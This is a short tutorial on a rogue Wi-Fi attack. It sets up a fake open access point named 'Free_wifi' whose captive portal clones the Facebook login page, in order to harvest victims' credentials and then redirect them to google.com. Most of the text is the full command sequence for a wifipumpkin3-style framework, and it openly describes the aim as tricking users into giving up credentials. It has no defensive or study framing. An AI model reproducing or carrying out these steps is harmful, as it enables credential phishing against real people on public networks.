Using captive portal attack

Creating a fake access point with an extra captive portal

What can we do using a captive portal?

• Basically, do phishing by cloning official login portals and trick or clients to give us credentials or sensitive information.

Configuration

• First, we define the SSID (Name of the access point), interface and ignoring pydns_server.

• In this case I'll be using a facebook captive portal to trick the users, so to install it just do the following.

use misc.extra_captiveflask
download

• Now I'll select the facebook template.

install facebook # simple as that
back

• Now we need to choose what proxy we want to use.

• In this case we will use the captiveflask proxy.

• Just type set proxy captiveflask

• Here in the setting options, I'll type set captiveflask.force_redirect_to_url https://google.com

• This will redirect the user to google.com once he types the requested credentials.

Victims phone

Attackers overview

Commands used

set interface wlan0
set ssid Free_wifi
use misc.extra_captiveflask
download
install facebook # simple as that
back
set proxy captiveflask
set captiveflask.force_redirect_to_url https://google.com
set captiveflask.facebook true
start